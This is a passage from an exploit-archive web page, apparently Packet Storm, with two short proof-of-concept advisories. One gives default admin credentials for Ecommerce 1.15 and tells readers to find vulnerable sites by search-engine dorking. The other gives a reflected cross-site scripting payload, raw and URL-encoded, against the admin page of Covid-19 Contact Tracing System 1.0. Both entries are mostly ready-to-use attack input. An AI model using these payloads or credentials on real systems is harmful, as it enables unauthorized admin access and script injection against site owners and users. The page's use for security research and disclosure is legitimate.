*   Other

Farmacia Gama 1.0 Cross Site Scripting

Ecommerce version 1.15 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Ecommerce 1.15 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/ecommerce                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpoint.com/ecommerce/adminGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Ecommerce 1.15 Insecure Settings

Covid-19 Contact Tracing System version 1.0 suffers from a cross site scripting vulnerability.

**Covid-19 Contact Tracing System 1.0 Cross Site Scripting**

Posted Aug 15, 2024

Authored by indoushka

Covid-19 Contact Tracing System version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | daa17a59d2ea2f605f71d11b3ba6860a33f90c5ea08d666ce8a3af42e59af5fa

Download | Favorite | View

**Covid-19 Contact Tracing System 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Covid-19 Contact Tracing System 1.0 XSS Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/cts_qr_1.zip                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /cts_qr/admin/?page=system_info'%22()%26%25<acx><ScRiPt%20>prompt(901045)</ScRiPt>[+] http://localhost/cts_qr/admin/?page=system_info%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(901045)%3C/ScRiPt%3EGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,419)
*   Arbitrary (16,881)
*   BBS (2,859)
*   Bypass (1,863)
*   CGI (1,033)
*   Code Execution (7,815)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,396)
*   DoS (25,084)
*   Encryption (2,389)
*   Exploit (53,208)
*   File Inclusion (4,263)
*   File Upload (996)
*   Firewall (822)
*   Info Disclosure (2,891)
*   Intrusion Detection (915)
*   Java (3,144)
*   JavaScript (896)
*   Kernel (7,222)
*   Local (14,799)
*   Magazine (586)
*   Overflow (13,172)
*   Perl (1,435)
*   PHP (5,225)
*   Proof of Concept (2,394)
*   Protocol (3,726)
*   Python (1,642)
*   Remote (31,659)
*   Root (3,636)
*   Rootkit (527)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,028)
*   Shell (3,275)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,277)
*   SQL Injection (16,610)
*   TCP (2,441)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (32,994)
*   Web (9,965)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,257)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,100)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,775)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,536)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,750)
*   UNIX (9,437)
*   UnixWare (187)
*   Windows (6,674)
*   Other

Tag

#windows